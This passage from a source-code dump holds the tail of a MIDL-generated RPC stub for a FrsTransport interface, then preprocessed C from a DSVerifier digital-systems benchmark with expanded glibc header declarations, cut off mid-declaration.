*/ NdrFcLong( 0x40000 ), /* 262144 */ /* 556 */ 0x11, 0x0, /* FC_RP */ /* 558 */ NdrFcShort( 0xfe4e ), /* Offset= -434 (124) */ /* 560 */ 0xb7, /* FC_RANGE */ 0x8, /* 8 */ /* 562 */ NdrFcLong( 0x0 ), /* 0 */ /* 566 */ NdrFcLong( 0x1 ), /* 1 */ /* 570 */ 0x11, 0x4, /* FC_RP [alloced_on_stack] */ /* 572 */ NdrFcShort( 0x2 ), /* Offset= 2 (574) */ /* 574 */ 0x30, /* FC_BIND_CONTEXT */ 0xa8, /* Ctxt flags: via ptr, out, strict, */ /* 576 */ 0x0, /* 0 */ 0x0, /* 0 */ /* 578 */ 0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */ /* 580 */ NdrFcShort( 0x2 ), /* Offset= 2 (582) */ /* 582 */ 0x12, 0x0, /* FC_UP */ /* 584 */ NdrFcShort( 0x90 ), /* Offset= 144 (728) */ /* 586 */ 0xb7, /* FC_RANGE */ 0x1, /* 1 */ /* 588 */ NdrFcLong( 0x0 ), /* 0 */ /* 592 */ NdrFcLong( 0x8 ), /* 8 */ /* 596 */ 0x2b, /* FC_NON_ENCAPSULATED_UNION */ 0x7, /* FC_USHORT */ /* 598 */ 0x7, /* Corr desc: FC_USHORT */ 0x0, /* */ /* 600 */ NdrFcShort( 0xfffe ), /* -2 */ /* 602 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ /* 604 */ NdrFcShort( 0x2 ), /* Offset= 2 (606) */ /* 606 */ NdrFcShort( 0x42 ), /* 66 */ /* 608 */ NdrFcShort( 0x3 ), /* 3 */ /* 610 */ NdrFcLong( 0x0 ), /* 0 */ /* 614 */ NdrFcShort( 0x16 ), /* Offset= 22 (636) */ /* 616 */ NdrFcLong( 0x1 ), /* 1 */ /* 620 */ NdrFcShort( 0x2e ), /* Offset= 46 (666) */ /* 622 */ NdrFcLong( 0x2 ), /* 2 */ /* 626 */ NdrFcShort( 0x3a ), /* Offset= 58 (684) */ /* 628 */ NdrFcShort( 0xffff ), /* Offset= -1 (627) */ /* 630 */ 0x1d, /* FC_SMFARRAY */ 0x0, /* 0 */ /* 632 */ NdrFcShort( 0x40 ), /* 64 */ /* 634 */ 0x1, /* FC_BYTE */ 0x5b, /* FC_END */ /* 636 */ 0x15, /* FC_STRUCT */ 0x1, /* 1 */ /* 638 */ NdrFcShort( 0x42 ), /* 66 */ /* 640 */ 0x6, /* FC_SHORT */ 0x4c, /* FC_EMBEDDED_COMPLEX */ /* 642 */ 0x0, /* 0 */ NdrFcShort( 0xfff3 ), /* Offset= -13 (630) */ 0x5b, /* FC_END */ /* 646 */ 0xb7, /* FC_RANGE */ 0x6, /* 6 */ /* 648 */ NdrFcLong( 0x80 ), /* 128 */ /* 652 */ NdrFcLong( 0x4000 ), /* 16384 */ /* 656 */ 0xb7, /* FC_RANGE */ 0x6, /* 6 */ /* 658 */ NdrFcLong( 0x2 ), /* 2 */ /* 662 */ NdrFcLong( 0x60 ), /* 96 */ /* 666 */ 0x1a, /* FC_BOGUS_STRUCT */ 0x1, /* 1 */ /* 668 */ NdrFcShort( 0x4 ), /* 4 */ /* 670 */ NdrFcShort( 0x0 ), /* 0 */ /* 672 */ NdrFcShort( 0x0 ), /* Offset= 0 (672) */ /* 674 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 676 */ NdrFcShort( 0xffe2 ), /* Offset= -30 (646) */ /* 678 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 680 */ NdrFcShort( 0xffe8 ), /* Offset= -24 (656) */ /* 682 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 684 */ 0x15, /* FC_STRUCT */ 0x1, /* 1 */ /* 686 */ NdrFcShort( 0x4 ), /* 4 */ /* 688 */ 0x6, /* FC_SHORT */ 0x6, /* FC_SHORT */ /* 690 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 692 */ 0x1a, /* FC_BOGUS_STRUCT */ 0x1, /* 1 */ /* 694 */ NdrFcShort( 0x44 ), /* 68 */ /* 696 */ NdrFcShort( 0x0 ), /* 0 */ /* 698 */ NdrFcShort( 0x0 ), /* Offset= 0 (698) */ /* 700 */ 0x6, /* FC_SHORT */ 0x4c, /* FC_EMBEDDED_COMPLEX */ /* 702 */ 0x0, /* 0 */ NdrFcShort( 0xff95 ), /* Offset= -107 (596) */ 0x5b, /* FC_END */ /* 706 */ 0x21, /* FC_BOGUS_ARRAY */ 0x1, /* 1 */ /* 708 */ NdrFcShort( 0x0 ), /* 0 */ /* 710 */ 0x3, /* Corr desc: FC_SMALL */ 0x0, /* */ /* 712 */ NdrFcShort( 0xfff8 ), /* -8 */ /* 714 */ NdrFcShort( 0x1 ), /* Corr flags: early, */ /* 716 */ NdrFcLong( 0xffffffff ), /* -1 */ /* 720 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 722 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 724 */ NdrFcShort( 0xffe0 ), /* Offset= -32 (692) */ /* 726 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 728 */ 0x1a, /* FC_BOGUS_STRUCT */ 0x7, /* 7 */ /* 730 */ NdrFcShort( 0x1c ), /* 28 */ /* 732 */ NdrFcShort( 0xffe6 ), /* Offset= -26 (706) */ /* 734 */ NdrFcShort( 0x0 ), /* Offset= 0 (734) */ /* 736 */ 0xb, /* FC_HYPER */ 0xb, /* FC_HYPER */ /* 738 */ 0x6, /* FC_SHORT */ 0x6, /* FC_SHORT */ /* 740 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 742 */ NdrFcShort( 0xff64 ), /* Offset= -156 (586) */ /* 744 */ 0x3f, /* FC_STRUCTPAD3 */ 0xd, /* FC_ENUM16 */ /* 746 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 748 */ 0x11, 0x0, /* FC_RP */ /* 750 */ NdrFcShort( 0x2 ), /* Offset= 2 (752) */ /* 752 */ 0x1c, /* FC_CVARRAY */ 0x0, /* 0 */ /* 754 */ NdrFcShort( 0x1 ), /* 1 */ /* 756 */ 0x29, /* Corr desc: parameter, FC_ULONG */ 0x0, /* */ /* 758 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ /* 760 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 762 */ 0x29, /* Corr desc: parameter, FC_ULONG */ 0x54, /* FC_DEREFERENCE */ /* 764 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ /* 766 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 768 */ 0x1, /* FC_BYTE */ 0x5b, /* FC_END */ /* 770 */ 0xb7, /* FC_RANGE */ 0x8, /* 8 */ /* 772 */ NdrFcLong( 0x0 ), /* 0 */ /* 776 */ NdrFcLong( 0x40000 ), /* 262144 */ /* 780 */ 0x11, 0x0, /* FC_RP */ /* 782 */ NdrFcShort( 0x2 ), /* Offset= 2 (784) */ /* 784 */ 0x1c, /* FC_CVARRAY */ 0x0, /* 0 */ /* 786 */ NdrFcShort( 0x1 ), /* 1 */ /* 788 */ 0x29, /* Corr desc: parameter, FC_ULONG */ 0x0, /* */ /* 790 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ /* 792 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 794 */ 0x29, /* Corr desc: parameter, FC_ULONG */ 0x54, /* FC_DEREFERENCE */ /* 796 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ /* 798 */ NdrFcShort( 0x0 ), /* Corr flags: */ /* 800 */ 0x1, /* FC_BYTE */ 0x5b, /* FC_END */ /* 802 */ 0xb7, /* FC_RANGE */ 0x8, /* 8 */ /* 804 */ NdrFcLong( 0x0 ), /* 0 */ /* 808 */ NdrFcLong( 0x40000 ), /* 262144 */ /* 812 */ 0x11, 0x4, /* FC_RP [alloced_on_stack] */ /* 814 */ NdrFcShort( 0x4 ), /* Offset= 4 (818) */ /* 816 */ 0x1, /* FC_BYTE */ 0x5c, /* FC_PAD */ /* 818 */ 0xb5, /* FC_PIPE */ 0x0, /* 0 */ /* 820 */ NdrFcShort( 0xfffc ), /* Offset= -4 (816) */ /* 822 */ NdrFcShort( 0x1 ), /* 1 */ /* 824 */ NdrFcShort( 0x1 ), /* 1 */ /* 826 */ 0x11, 0x4, /* FC_RP [alloced_on_stack] */ /* 828 */ NdrFcShort( 0x4 ), /* Offset= 4 (832) */ /* 830 */ 0x1, /* FC_BYTE */ 0x5c, /* FC_PAD */ /* 832 */ 0xb5, /* FC_PIPE */ 0x0, /* 0 */ /* 834 */ NdrFcShort( 0xfffc ), /* Offset= -4 (830) */ /* 836 */ NdrFcShort( 0x1 ), /* 1 */ /* 838 */ NdrFcShort( 0x1 ), /* 1 */ 0x0 } }; static const unsigned short FrsTransport_FormatStringOffsetTable[] = { 0, 48, 120, 168, 276, 348, 396, 486, 534, 602, 676, 732, 794, 838, 934, 1024, 1074 }; static const MIDL_STUB_DESC FrsTransport_StubDesc = { (void *)& FrsTransport___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &FrsTransport__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Dfrs2__MIDL_TypeFormatString.Format, 1, /* -error bounds_check flag */ 0x50002, /* Ndr library version */ 0, 0x8000253, /* MIDL Version 8.0.595 */ 0, 0, 0, /* notify & notify_flag routine table */ 0x1, /* MIDL flag */ 0, /* cs routines */ 0, /* proxy/server info */ 0 }; #if _MSC_VER >= 1200 #pragma warning(pop) #endif #endif /* defined(_M_AMD64)*/
the_stack_data/31388829.c
# 1 "benchmarks/ds-09-impl3.c" # 1 "<built-in>" # 1 "<command-line>" # 1 "/usr/include/stdc-predef.h" 1 3 4 # 1 "<command-line>" 2 # 1 "benchmarks/ds-09-impl3.c" # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 1 # 20 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/definitions.h" 1 # 132 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/definitions.h" int X_SIZE_VALUE = 0; int overflow_mode = 1; int rounding_mode = 0; # 155 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/definitions.h" typedef struct { double a[100]; int a_size; double b[100]; int b_size; double sample_time; double a_uncertainty[100]; double b_uncertainty[100]; } digital_system; typedef struct { double A[4][4]; double B[4][4]; double C[4][4]; double D[4][4]; double states[4][4]; double outputs[4][4]; double inputs[4][4]; double K[4][4]; unsigned int nStates; unsigned int nInputs; unsigned int nOutputs; } digital_system_state_space; typedef struct { int int_bits; int frac_bits; double max; double min; int default_realization; double delta; int scale; double max_error; } implementation; typedef struct { int push; int in; int sbiw; int cli; int out; int std; int ldd; int subi; int sbci; int lsl; int rol; int add; int adc; int adiw; int rjmp; int mov; int sbc; int ld; int rcall; int cp; int cpc; int ldi; int brge; int pop; int ret; int st; int brlt; int cpi; } instructions; typedef struct { long clock; int device; double cycle; instructions assembly; } hardware; typedef struct{ float Ap, Ar, Ac; float wp, wc, wr; int type; }filter_parameters; # 21 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2 # 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" 1 # 17 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/compatibility.h" # 1 "/usr/include/stdlib.h" 1 3 4 # 25 "/usr/include/stdlib.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4 # 33 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 3 4 # 1 "/usr/include/features.h" 1 3 4 # 461 "/usr/include/features.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 1 3 4 # 452 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4 # 453 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/long-double.h" 1 3 4 # 454 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 2 3 4 # 462 "/usr/include/features.h" 2 3 4 # 485 "/usr/include/features.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 1 3 4 # 10 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h" 1 3 4 # 11 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 2 3 4 # 486 "/usr/include/features.h" 2 3 4 # 34 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 2 3 4 # 26 "/usr/include/stdlib.h" 2 3 4 # 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4 # 209 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 3 4 # 209 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 3 4 typedef long unsigned int size_t; # 321 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 3 4 typedef int wchar_t; # 32 "/usr/include/stdlib.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/waitflags.h" 1 3 4 # 52 "/usr/include/x86_64-linux-gnu/bits/waitflags.h" 3 4 typedef enum { P_ALL, P_PID, P_PGID } idtype_t; # 40 "/usr/include/stdlib.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/waitstatus.h" 1 3 4 # 41 "/usr/include/stdlib.h" 2 3 4 # 55 "/usr/include/stdlib.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 1 3 4 # 120 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 1 3 4 # 24 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/long-double.h" 1 3 4 # 25 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 2 3 4 # 121 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 2 3 4 # 56 "/usr/include/stdlib.h" 2 3 4 typedef struct { int quot; int rem; } div_t; typedef struct { long int quot; long int rem; } ldiv_t; __extension__ typedef struct { long long int quot; long long int rem; } lldiv_t; # 97 "/usr/include/stdlib.h" 3 4 extern size_t __ctype_get_mb_cur_max (void) __attribute__ ((__nothrow__ , __leaf__)) ; extern double atof (const char *__nptr) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ; extern int atoi (const char *__nptr) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ; extern long int atol (const char *__nptr) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ; __extension__ extern long long int atoll (const char *__nptr) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ; extern double strtod (const char *__restrict __nptr, char **__restrict __endptr) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); extern float strtof (const char *__restrict __nptr, char **__restrict __endptr) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); extern long double strtold (const char *__restrict __nptr, char **__restrict __endptr) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); # 176 "/usr/include/stdlib.h" 3 4 extern long int strtol (const char *__restrict __nptr, char **__restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); extern unsigned long int strtoul (const char *__restrict __nptr, char **__restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); __extension__ extern long long int strtoq (const char *__restrict __nptr, char **__restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); __extension__ extern unsigned long long int strtouq (const char *__restrict __nptr, char **__restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); __extension__ extern long long int strtoll (const char *__restrict __nptr, char **__restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); __extension__ extern unsigned long long int strtoull (const char *__restrict __nptr, char **__restrict __endptr, int __base) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))); # 385 "/usr/include/stdlib.h" 3 4 extern char *l64a (long int __n) __attribute__ ((__nothrow__ , __leaf__)) ; extern long int a64l (const char *__s) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ; # 1 "/usr/include/x86_64-linux-gnu/sys/types.h" 1 3 4 # 27 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/types.h" 1 3 4 # 27 "/usr/include/x86_64-linux-gnu/bits/types.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4 # 28 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/timesize.h" 1 3 4 # 29 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4 typedef unsigned char __u_char; typedef unsigned short int __u_short; typedef unsigned int __u_int; typedef unsigned long int __u_long; typedef signed char __int8_t; typedef unsigned char __uint8_t; typedef signed short int __int16_t; typedef unsigned short int __uint16_t; typedef signed int __int32_t; typedef unsigned int __uint32_t; typedef signed long int __int64_t; typedef unsigned long int __uint64_t; typedef __int8_t __int_least8_t; typedef __uint8_t __uint_least8_t; typedef __int16_t __int_least16_t; typedef __uint16_t __uint_least16_t; typedef __int32_t __int_least32_t; typedef __uint32_t __uint_least32_t; typedef __int64_t __int_least64_t; typedef __uint64_t __uint_least64_t; typedef long int __quad_t; typedef unsigned long int __u_quad_t; typedef long int __intmax_t; typedef unsigned long int __uintmax_t; # 141 "/usr/include/x86_64-linux-gnu/bits/types.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/typesizes.h" 1 3 4 # 142 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/time64.h" 1 3 4 # 143 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4 typedef unsigned long int __dev_t; typedef unsigned int __uid_t; typedef unsigned int __gid_t; typedef unsigned long int __ino_t; typedef unsigned long int __ino64_t; typedef unsigned int __mode_t; typedef unsigned long int __nlink_t; typedef long int __off_t; typedef long int __off64_t; typedef int __pid_t; typedef struct { int __val[2]; } __fsid_t; typedef long int __clock_t; typedef unsigned long int __rlim_t; typedef unsigned long int __rlim64_t; typedef unsigned int __id_t; typedef long int __time_t; typedef unsigned int __useconds_t; typedef long int __suseconds_t; typedef int __daddr_t; typedef int __key_t; typedef int __clockid_t; typedef void * __timer_t; typedef long int __blksize_t; typedef long int __blkcnt_t; typedef long int __blkcnt64_t; typedef unsigned long int __fsblkcnt_t; typedef unsigned long int __fsblkcnt64_t; typedef unsigned long int __fsfilcnt_t; typedef unsigned long int __fsfilcnt64_t; typedef long int __fsword_t; typedef long int __ssize_t; typedef long int __syscall_slong_t; typedef unsigned long int __syscall_ulong_t; typedef __off64_t __loff_t; typedef char *__caddr_t; typedef long int __intptr_t; typedef unsigned int __socklen_t; typedef int __sig_atomic_t; # 30 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4 typedef __u_char u_char; typedef __u_short u_short; typedef __u_int u_int; typedef __u_long u_long; typedef __quad_t quad_t; typedef __u_quad_t u_quad_t; typedef __fsid_t fsid_t; typedef __loff_t loff_t; typedef __ino_t ino_t; # 59 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4 typedef __dev_t dev_t; typedef __gid_t gid_t; typedef __mode_t mode_t; typedef __nlink_t nlink_t; typedef __uid_t uid_t; typedef __off_t off_t; # 97 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4 typedef __pid_t pid_t; typedef __id_t id_t; typedef __ssize_t ssize_t; typedef __daddr_t daddr_t; typedef __caddr_t caddr_t; typedef __key_t key_t; # 1 "/usr/include/x86_64-linux-gnu/bits/types/clock_t.h" 1 3 4 typedef __clock_t clock_t; # 127 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/types/clockid_t.h" 1 3 4 typedef __clockid_t clockid_t; # 129 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/types/time_t.h" 1 3 4 typedef __time_t time_t; # 130 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/types/timer_t.h" 1 3 4 typedef __timer_t timer_t; # 131 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4 # 144 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4 # 1 "/usr/lib/gcc/x86_64-linux-gnu/9/include/stddef.h" 1 3 4 # 145 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4 typedef unsigned long int ulong; typedef unsigned short int ushort; typedef unsigned int uint; # 1 "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h" 1 3 4 # 24 "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h" 3 4 typedef __int8_t int8_t; typedef __int16_t int16_t; typedef __int32_t int32_t; typedef __int64_t int64_t; # 156 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4 typedef __uint8_t u_int8_t; typedef __uint16_t u_int16_t; typedef __uint32_t u_int32_t; typedef __uint64_t u_int64_t; typedef int register_t __attribute__ ((__mode__ (__word__))); # 176 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4 # 1 "/usr/include/endian.h" 1 3 4 # 24 "/usr/include/endian.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/endian.h" 1 3 4 # 35 "/usr/include/x86_64-linux-gnu/bits/endian.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/endianness.h" 1 3 4 # 36 "/usr/include/x86_64-linux-gnu/bits/endian.h" 2 3 4 # 25 "/usr/include/endian.h" 2 3 4 # 35 "/usr/include/endian.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 1 3 4 # 33 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 3 4 static __inline __uint16_t __bswap_16 (__uint16_t __bsx) { return __builtin_bswap16 (__bsx); } static __inline __uint32_t __bswap_32 (__uint32_t __bsx) { return __builtin_bswap32 (__bsx); } # 69 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 3 4 __extension__ static __inline __uint64_t __bswap_64 (__uint64_t __bsx) { return __builtin_bswap64 (__bsx); } # 36 "/usr/include/endian.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/uintn-identity.h" 1 3 4 # 32 "/usr/include/x86_64-linux-gnu/bits/uintn-identity.h" 3 4 static __inline __uint16_t __uint16_identity (__uint16_t __x) { return __x; } static __inline __uint32_t __uint32_identity (__uint32_t __x) { return __x; } static __inline __uint64_t __uint64_identity (__uint64_t __x) { return __x; } # 37 "/usr/include/endian.h" 2 3 4 # 177 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/sys/select.h" 1 3 4 # 30 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/select.h" 1 3 4 # 22 "/usr/include/x86_64-linux-gnu/bits/select.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4 # 23 "/usr/include/x86_64-linux-gnu/bits/select.h" 2 3 4 # 31 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/types/sigset_t.h" 1 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/types/__sigset_t.h" 1 3 4 typedef struct { unsigned long int __val[(1024 / (8 * sizeof (unsigned long int)))]; } __sigset_t; # 5 "/usr/include/x86_64-linux-gnu/bits/types/sigset_t.h" 2 3 4 typedef __sigset_t sigset_t; # 34 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_timeval.h" 1 3 4 struct timeval { __time_t tv_sec; __suseconds_t tv_usec; }; # 38 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 1 3 4 # 10 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 3 4 struct timespec { __time_t tv_sec; __syscall_slong_t tv_nsec; # 26 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 3 4 }; # 40 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4 typedef __suseconds_t suseconds_t; typedef long int __fd_mask; # 59 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4 typedef struct { __fd_mask __fds_bits[1024 / (8 * (int) sizeof (__fd_mask))]; } fd_set; typedef __fd_mask fd_mask; # 91 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4 # 101 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4 extern int select (int __nfds, fd_set *__restrict __readfds, fd_set *__restrict __writefds, fd_set *__restrict __exceptfds, struct timeval *__restrict __timeout); # 113 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4 extern int pselect (int __nfds, fd_set *__restrict __readfds, fd_set *__restrict __writefds, fd_set *__restrict __exceptfds, const struct timespec *__restrict __timeout, const __sigset_t *__restrict __sigmask); # 126 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4 # 180 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4 typedef __blksize_t blksize_t; typedef __blkcnt_t blkcnt_t; typedef __fsblkcnt_t fsblkcnt_t; typedef __fsfilcnt_t fsfilcnt_t; # 227 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 1 3 4 # 23 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 1 3 4 # 44 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 1 3 4 # 21 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4 # 22 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 2 3 4 # 45 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4 typedef struct __pthread_internal_list { struct __pthread_internal_list *__prev; struct __pthread_internal_list *__next; } __pthread_list_t; typedef struct __pthread_internal_slist { struct __pthread_internal_slist *__next; } __pthread_slist_t; # 74 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 1 3 4 # 22 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 3 4 struct __pthread_mutex_s { int __lock; unsigned int __count; int __owner; unsigned int __nusers; int __kind; short __spins; short __elision; __pthread_list_t __list; # 53 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 3 4 }; # 75 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4 # 87 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4 # 1 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 1 3 4 # 23 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 3 4 struct __pthread_rwlock_arch_t { unsigned int __readers; unsigned int __writers; unsigned int __wrphase_futex; unsigned int __writers_futex; unsigned int __pad3; unsigned int __pad4; int __cur_writer; int __shared; signed char __rwelision; unsigned char __pad1[7]; unsigned long int __pad2; unsigned int __flags; # 55 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 3 4 }; # 88 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4 struct __pthread_cond_s { __extension__ union { __extension__ unsigned long long int __wseq; struct { unsigned int __low; unsigned int __high; } __wseq32; }; __extension__ union { __extension__ unsigned long long int __g1_start; struct { unsigned int __low; unsigned int __high; } __g1_start32; }; unsigned int __g_refs[2] ; unsigned int __g_size[2]; unsigned int __g1_orig_size; unsigned int __wrefs; unsigned int __g_signals[2]; }; # 24 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 2 3 4 typedef unsigned long int pthread_t; typedef union { char __size[4]; int __align; } pthread_mutexattr_t; typedef union { char __size[4]; int __align; } pthread_condattr_t; typedef unsigned int pthread_key_t; typedef int pthread_once_t; union pthread_attr_t { char __size[56]; long int __align; }; typedef union pthread_attr_t pthread_attr_t; typedef union { struct __pthread_mutex_s __data; char 